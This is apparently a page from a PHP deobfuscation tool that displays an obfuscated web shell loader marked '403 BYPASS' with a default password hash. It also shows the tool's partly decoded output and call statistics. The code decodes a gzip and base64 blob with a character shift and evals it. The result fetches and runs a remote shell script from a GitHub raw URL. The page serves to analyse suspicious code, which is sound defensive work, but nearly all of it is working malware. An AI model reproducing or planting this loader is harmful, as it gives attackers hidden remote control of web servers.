Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $pw = "bbf94b34eb32268ada57a3be5062fe7d"; /*403 BYPASS MD5 DEFAULT PASSWORD : 40..
Decoded Output download
!!!!!fdip!fwbm)(@?(!/!gjmf`hfu`dpoufout)(iuuqt;00sbx/hjuivcvtfsdpoufou/dpn0514CZQBTTTIFMM0IFLFLF0nbjo0iflflf/qiq(-!!GJMF`VTF`JODMVEF`QBUI**!/!#]o#<fdip!)jodmvef!(iuuqt;00sbx/hjuivcvtfsdpoufou/dpn0514CZQBTTTIFMM0IFLFLF0nbjo0iflflf/qiq(*!/!#]o#<@?
Did this file decode correctly?
Original Code
<?php
$pw = "bbf94b34eb32268ada57a3be5062fe7d";
/*403 BYPASS MD5 DEFAULT PASSWORD : 403 */
function bypass($shell)
{
$shell = gzinflate(base64_decode($shell));
for ($i = 0; $i < strlen($shell); $i++) {
$shell[$i] = chr(ord($shell[$i]) - 1);
}
return $shell;
}
eval(bypass("U1QEAu60lMwCxbTypFxNDQd7DUV9xfSs3LSEjLTShJSC/NK0/NISTY3M0tLCEmsDg+KkCv2MrNLMsuSykrRiqLx+SkGegamhiXNUoFNISIinm6+vgaebDxAa5CVl5RtkpuUAoX5hZqGGrqKiu5evW0JYiFuCl7+Lb5irW0KgU6inlhbQXuXYfGUbiHM0s/JTcstS0xSpZjPcAgd7AA=="));
Function Calls
chr | 247 |
ord | 247 |
bypass | 1 |
strlen | 248 |
gzinflate | 1 |
base64_decode | 1 |
Stats
MD5 | 92508d01964f32d8a6900665b66a2f9b |
Eval Count | 1 |
Decode Time | 790 ms |